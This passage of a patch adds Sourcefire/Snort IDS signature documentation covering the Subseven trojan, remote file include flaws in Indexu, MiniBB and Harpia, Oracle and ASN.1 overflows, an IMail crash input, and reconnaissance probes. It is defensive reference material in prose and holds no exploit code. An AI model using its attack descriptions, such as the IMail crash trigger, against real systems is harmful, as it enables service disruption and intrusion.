+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan listens on either port 27374 or port 1243.
+
+Subseven is an improved version of the Netbus Trojan (see sids 114, 
+115), Subseven 2.1 Gold is an improved version of Subseven that 
+affects Windows 95 and 98 implementations.
+
+The Trojan changes system startup files and registry settings to add the
+Subseven server to programs normally started on boot.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
+    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry key added:
+
+	Winloader
+
+Also affected:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+
+This registry key should be blank, i.e. ""
+
+The registry should also be searched for the entry  
+
+  HKEY_CLASSES_ROOT\.dl 
+
+if this exists it should be deleted.
+
+This Trojan may also be started from the files win.ini and system.ini, 
+remove the entry run=MSREXE.exe and change the line 
+shell=Explorer.exe MSREXE.exe to the default value shell=explorer.exe.
+
+Removal of the Trojan is also required, look for the file "MSREXE.exe" 
+in the <drive>:\Windows\ or <drive>:\Windows\System\ folders.
+
+Additionally, the files "RUN.EXE", "WINDOS.EXE" or "MUEEXE.EXE" may also
+be present on the system and should be removed along with any references
+to them in the start up locations in the same manner as for MSREXE.exe.
+
+Note, these file names are the default ones and can be changed by the 
+attacker.
+
+A machine reboot is required to clear the existing process from running 
+in memory.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Hackfix
+http://www.hackfix.org/subseven/
+
+McAfee
+http://vil.mcafee.com/dispVirus.asp?virus_k=10566
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/subseven/gold/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/100000638.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000638
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_export.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_export.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/331.txt
@@ -0,0 +1,65 @@
+Rule: 
+reference:arachnids,132; reference:cve,CVE-1999-0612;
+classtype:attempted-recon; sid:331; rev:6;)
+
+--
+Sid: 331
+
+-- 
+
+Summary:
+This is an intelligence gathering activity. This event is indicative of an information leak attempt against a finger daemon performed by a vulnerability scanner
+
+-- 
+
+Impact:
+The attacker may obtain information about user accounts on the target system.
+
+--
+Detailed Information:
+This event is generated when an attempt to query the finger daemon is attempted by the Cybercop vulnerability scanner. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The scan will confirm that the target host will respond to finger queries.
+
+--
+
+Attack Scenarios: 
+An attacker uses the Cybercop vulnerability scanner to test for this weakness.
+
+-- 
+
+Ease of Attack: 
+Simple, performed by a scanner
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via a firewall or TCP wrappers.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS132
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0612
+
+--
--- /dev/null
+++ b/doc/signatures/100000640.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000640
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_manager.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_manager.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2216.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2216
+
+--
+Summary:
+This event is generated when an attempt is made to access readmail.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in Ipswitch IMail 7.04 and earlier.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+Ipswitch IMail is a mail server that supports multiple mail protocols. Its web mail implementation contains a vulnerability in readmail.cgi where, if a mailbox name with more than 248 dot characters (.) is requested, the server will crash. It has also been reported that this is caused by a buffer overflow error that may allow an attacker to execute arbitrary code, but this has not been confirmed.
+
+--
+Affected Systems:
+Mail servers running Ipswitch Imail 7.04 and earlier with web mail enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request to readmail.cgi for a mailbox with more than 248 dot characters in the mailbox name parameter. The mail server will crash and must be restarted.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses readmail.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer version or apply the vendor-supplied hotfix available at ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail704.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/3427
+
+--
--- /dev/null
+++ b/doc/signatures/100000837.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000837
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiniBB" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "absolute_path" parameter in the "index.php" script used by the "MiniBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiniBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1426.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1426
+
+--
+Summary:
+This event is generated when an attempt is made to attack a device using SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service (DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community string 
+buffer overflow, that will allow an attacker to execute arbitrary code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of SNMP v1 protocol
+	
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 161 
+of a vulnerable device, causing a Denial of Service or possible execution of 
+arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the SNMP v1 protocol, use SNMP v2 protocol as an alternative.
+
+Disable the use of SNMP for devices that do not need it.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-03.html
+
+--
--- /dev/null
+++ b/doc/signatures/1262.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1262
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) admind is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port admind is using.  Attackers can also learn what versions of the admind protocol are accepted by admind.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as admind run.  The admind RPC service is used by some UNIX hosts to remotely perform distributed system administration tasks such as adding new users.  If weak authentication is used, it may be possible for a malicious user to perform remote administration.
+
+--
+Affected Systems:
+Any host running admind with weak authentication.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where admind runs.  This may be a precursor to accessing admind.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access admind, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for admind, not probes of the admind service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the admind service itself. An attacker may attempt to go directly to the admind port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS18
+
+
+--
--- /dev/null
+++ b/doc/signatures/2111.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+2111
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command DELE.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by
+sending a line feed character to a POP server via the DELE command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1939:
+http://www.faqs.org/rfcs/rfc1939.html
+
+--
--- /dev/null
+++ b/doc/signatures/1364.txt
@@ -0,0 +1,49 @@
+Rule:
+
+--
+Sid:
+1364
+
+--
+Summary:
+Attempted lsof command access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the processes being run on a webserver. The lsof command lists information about files that are open by the running processes.  An open file may be a regular file, a directory, a block special file, a character special file, an executing text reference, a library, a stream or a network file (Internet socket, NFS file or Unix domain socket). The attacker could possibly gain information needed for other attacks on the system.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'lsof' in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine.
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1329
+man lsof
+
+--
--- /dev/null
+++ b/doc/signatures/100000108.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000108
+
+-- 
+Summary: 
+This event is generated when an SQL injection attempt is made against the 
+OpenBB web bulliten board system.
+
+-- 
+
+Impact: 
+Attackers may run arbitrary database commands with the privileges of the 
+affected script.
+
+--
+Detailed Information:
+This rule looks specifically for attacks against the board.php module of the 
+OpenBB program. Attackers must supply a variable whose value is numeric, 
+followed by a space, in order to exploit this vulnerability.
+
+--
+Affected Systems:
+OpenBB 1.0.5
+OpenBB 1.1.0
+
+--
+
+Attack Scenarios: 
+A web browser or a script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as example attacks that can be used with a web browser are publicly 
+available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, no vendor-supplied patches are available. A descripton of an 
+unverified workaround is available in the Additional References section.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://www.securityfocus.com/archive/1/319714
+
+-- 
--- /dev/null
+++ b/doc/signatures/2783.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2783
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_unique_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/622.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+622
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000670.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000670
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "web_statsConfig.php" using a remote file being passed as 
+the "mod_dir" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "mod_dir" parameter in the "web_statsConfig.php" script 
+used by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2844.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2844
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2385.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+2385
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1355.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1349
+
+--
+Summary:
+Attempted /usr/bin/perl access via web
+
+--
+Impact:
+Attempt to execute a perl script on a host.
+
+--
+Detailed Information:
+This is an attempt to execute a perl script on a host. perl is a scripting language that is available on a wide variety of platforms. By default perl code runs with full access to all libraries and inbuilt commands available to the language. When combined with the access permissions of the user executing the script, the consequences of running arbitrary code can be devastating
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP transaction that includes a reference to perl in the URI.
+
+--
+Ease of Attack:
+Simple HTTP.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. perl may also be requested on a command line should the attacker gain access to the machine. Whenever possible, all perl scripts on the host should be written using the restriceted access mode. This forces perl to execute the scripts in a "sandbox" which will disallow unsafe operations in the code.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1350
+
+--
--- /dev/null
+++ b/doc/signatures/100000573.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000573
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_setup.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "app_setup.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2140.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2140
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the p-news bulletin board.
+
+--
+Impact:
+Possible escalation of privilege.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access the p-news bulletin board. The p-news application has a flaw that allows normal users to escalate their privilege level to that of the administrator by using a malformed username.
+
+The attacker may be trying to gain administrator access.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can take control of the application by supplying a specially crafted malformed username.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Apply the appropriate vendor patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000569.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000569
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_change_email.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"app_change_email.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2841.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2841
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
